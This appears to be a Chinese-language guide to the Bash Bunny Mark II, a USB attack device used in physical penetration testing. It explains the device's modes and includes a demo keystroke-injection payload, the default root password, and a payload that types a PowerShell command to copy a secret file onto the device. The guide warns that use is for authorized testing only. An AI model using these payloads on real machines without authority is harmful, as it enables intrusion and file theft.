跳至主要内容

Bash Bunny Mark II — 完整指南

一句話定位:Bash Bunny Mark II 是 USB Rubber Ducky 的「全家桶」——同一支 USB 插進去,它同時可以是鍵盤、網路卡、序列埠和隨身碟,還能跑完整 Linux 工具。一顆四核 ARM 心臟配上 8GB 桌面級 SSD,插上後 7 秒完成滲透。

如果 USB Rubber Ducky 是專才,那 Bash Bunny 就是插進 USB 的瑞士刀。它同時模擬多種受信任的裝置型別 — 這很重要,因為一臺永遠不會讓可疑「鍵盤」靠近網路的機器,會樂意把 DHCP 租約交給一個「USB 乙太網路轉接器」,並把 root shell 交給一個「序列主控臺」。

Mark II 用四核 CPU、桌面級 SSD、加倍記憶體,以及用於遠端觸發與地理圍欄的 Bluetooth LE 升級了原版。它是實體社交工程任務的主力。

⚠️ 僅限授權測試。 對你不擁有的機器發動多向量攻擊是違法的。在自己的實驗室或取得書面許可後進行。


規格一覽

專案規格
CPU四核 ARM Cortex-A7 @ 最高 1.3 GHz
儲存8 GB NAND SSD(桌面級,快速)
擴充MicroSD XC(大規模外洩最高 2 TB)
無線Bluetooth LE(遠端觸發、地理圍欄)
攻擊介面HID 鍵盤 + USB 乙太網路 + 序列 + USB 儲存(同時)
OSDebian Linux 附 root shell(預載 nmap、responder、impacket、metasploit)
開關3 段式模式選擇器
指示燈1× RGB LED
主控臺專屬序列主控臺(root 終端機)+ Cloud C²
官方檔案https://docs.hak5.org/bash-bunny

3 段式開關

位置 3(最靠近 USB 插頭)是 arming 模式 — Bunny 以隨身碟 + 序列主控臺的形式出現,讓你能載入 payload。位置 1 和 2 會自動執行存放在各自資料夾中的 payload。

USB plug ── switch positions ──>
position 1: auto-run /payloads/switch1/
position 2: auto-run /payloads/switch2/
position 3: ARMING MODE (flash drive + serial)

快速入門 — 第一個 payload

步驟 1 — Arm 你的 Bunny

把開關撥到位置 3,插進你的電腦。會出現兩樣東西:一個隨身碟(payload 區域)和一個序列主控臺

步驟 2 — 丟入 payload

瀏覽磁碟,把你的指令碼放在:

/payloads/switch1/payload.txt

最簡單的「證明它能用」的 Windows 目標 payload:

LED R # red = running
ATTACKMODE HID STORAGE
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 800
STRING echo pwned by Bash Bunny
ENTER
LED G # green = done

Bash Bunny 的 payload 是 Bash 指令碼(這就是名字裡的「Bash」),使用 Hak5 的 ATTACKMODELED 與輔助指令。你可以把純 Bash(執行 nmap、複製檔案)與 DuckyScript 風格的 HID 注入混在一起。

步驟 3 — 部署

  1. 退出,撥到位置 1,拔掉。
  2. 插進目標(你的實驗室機器)。看 LED 先變紅,再變綠。
  3. cmd 開啟並印出 pwned by Bash Bunny

步驟 4 — 序列主控臺(arming 模式)

撥到位置 3,連線序列主控臺,取得 root shell 來管理檔案與 payload:

Username: root
Password: hak5bunny
# ls /root/loot/

多向量攻擊 — 為什麼它很強大

一支 Bash Bunny 就能用一條線完成過去需要好幾支工具的事:

攻擊向量Bunny 怎麼做到
按鍵注入HID 模式把按鍵打進目標
網路存取USB 乙太網路模式 — 目標給你一個 IP;你現在就網路上
資料外洩切到儲存並複製檔案;或透過 USB-乙太網路連結推出去
序列模擬序列裝置以觸及嵌入式/主控臺機器
即時工具完整 Debian:nmapresponderimpacketmetasploit 直接在裝置上
藍芽觸發透過 BLE 遠端觸發或地理圍欄一個 payload

範例 — 抓一個檔案並外洩它:

LED R
ATTACKMODE HID STORAGE
DELAY 2000
GUI r
DELAY 500
STRING powershell -c "copy C:\Users\Public\secret.txt X:\"
ENTER
DELAY 3000
LED G

這會打出一個 shell 指令,把檔案複製到 Bunny 自己的儲存磁碟,完成後變綠。(在你自己的機器上用你自己的檔案練習!)


進階

能力怎麼做
Payload 切換2 個自動執行開關位置 + arming = 不用編輯就能執行不同 payload
遠端/地理圍欄BLE:當你物理上靠近時觸發 payload,或離開某區域時自我銷毀
Root Linux shell完整 Debian 附滲透測試工具;直接進入 nmap/metasploit
Cloud C² 管理透過 Hak5 Cloud C² 遠端管理 payload/裝置
大規模外洩2 TB MicroSD 用於複製數 GB 的 loot
GET_SWITCH_POSITIONPayload 可以讀取自己在哪個開關位置並分支

疑難排解

症狀原因修正
位置 3 沒有隨身碟開關沒有完全在 arming 位置把開關完全推到位置 3;拔掉再重插
LED 閃紅燈Payload 錯誤接上序列主控臺,執行 payload,讀取錯誤
按鍵錯誤 / 沒打字配置或缺少 DELAY加上 LED + DELAY,並鎖定正確的鍵盤配置
只有 HID 能用,沒有乙太網路ATTACKMODE 沒有包含 ETHERNET在 payload 中使用 ATTACKMODE HID ETHERNET
連不上序列驅動程式/鮑率錯誤使用 Hak5 USB 線與檔案記載的序列設定(見產品檔案)

相關資源